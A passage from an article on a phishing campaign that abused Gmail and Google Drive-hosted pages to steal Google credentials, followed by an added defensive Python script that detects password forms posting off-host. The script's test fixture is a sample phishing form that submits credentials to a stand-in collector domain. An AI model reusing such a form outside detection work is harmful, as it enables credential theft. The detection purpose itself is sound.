In this case, the attackers used Gmail to distribute emails containing links to unauthorized Web pages hosted on Google Drive, and then stored stolen credentials through a third-party domain.
Though researchers are uncertain whether the Gmail account was compromised or if attackers created a false account, the phishing emails were delivered successfully and undetected by Google’s built-in spam engine.
Here’s a complete workflow of the phishing campaign:
When Elastica reported it to Google two weeks prior to this announcement, all the components in this phishing attack were working. Though the phishing Web pages have been reported to Google, they are currently still active and have not yet been removed.
“In this particular incident, attackers were able to circumvent tight security controls and target Google users specifically to gain access to a multitude of services associated with Google accounts,” said Dr. Aditya K Sood, architect of Elastica Cloud Threat Labs.
Because the phishing Web pages are hosted on Google Drive, standard blacklisting using IP addresses and URLs is ineffective. Traditional intrusion detection and prevention systems cannot provide defense in these types of scenarios either. Credentials stolen in these attacks can be used by attackers themselves or sold on the digital black market to buyers who then use them for malicious purposes.
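As an added illustration of the point above (example code, not from the article or from Elastica), the script below contrasts the traditional hosting-domain blocklist check with a content-level check: it parses a page and flags any form that asks for a password but submits it to a host other than the one serving the page, which is exactly the pattern of a harvesting page hosted on trusted infrastructure that forwards credentials to a third-party domain. The page URL, HTML and blocklist entries are constructed for illustration.

```python
"""Added example (not from the original article): a defender-side check for
credential-harvesting pages hosted on trusted infrastructure.

A domain or IP blocklist cannot flag a page served from a Google host, so
instead we inspect the page body and flag forms that collect a password but
submit it to a domain other than the one hosting the page. The sample HTML,
page URL and hostnames below are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed: a login page served from a trusted host whose form posts the
# credentials to an unrelated third-party domain.
SAMPLE_PAGE_URL = "https://drive.google.com/example-hosted-page"  # constructed
SAMPLE_HTML = """
<html><body>
<form method="post" action="https://collector.example.net/save.php">
  <input type="text" name="email">
  <input type="password" name="passwd">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Constructed: the kind of hosting domains a URL blocklist typically contains.
# A Google-hosted page can never appear here, so this check is blind to it.
BLOCKLIST = {"known-bad-host.example", "another-bad-host.example"}


class FormCollector(HTMLParser):
    """Collects each <form>'s action URL and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "has_password": bool}
        self._current = None   # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_blocklisted(page_url, blocklist):
    """The traditional check: is the hosting domain on the blocklist?"""
    return urlsplit(page_url).hostname in blocklist


def off_host_credential_forms(page_url, html):
    """Return the action URLs of forms that ask for a password but submit it
    to a host different from the one serving the page."""
    page_host = urlsplit(page_url).hostname
    parser = FormCollector()
    parser.feed(html)
    suspicious = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        action_host = urlsplit(form["action"]).hostname
        # A relative action (no host) submits back to the page host: not flagged.
        if action_host and action_host != page_host:
            suspicious.append(form["action"])
    return suspicious


if __name__ == "__main__":
    print("hosting domain blocklisted:", host_blocklisted(SAMPLE_PAGE_URL, BLOCKLIST))
    print("off-host credential forms:", off_host_credential_forms(SAMPLE_PAGE_URL, SAMPLE_HTML))
```

The blocklist check returns `False` for the sample page because its hosting domain is a Google one, while the content check returns the third-party action URL. The content check is not a silver bullet (it misses pages that exfiltrate via script rather than a form action), but it illustrates why detection for this class of attack has to look at what the page does rather than where it is hosted.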
Here’s a video of the phishing in action: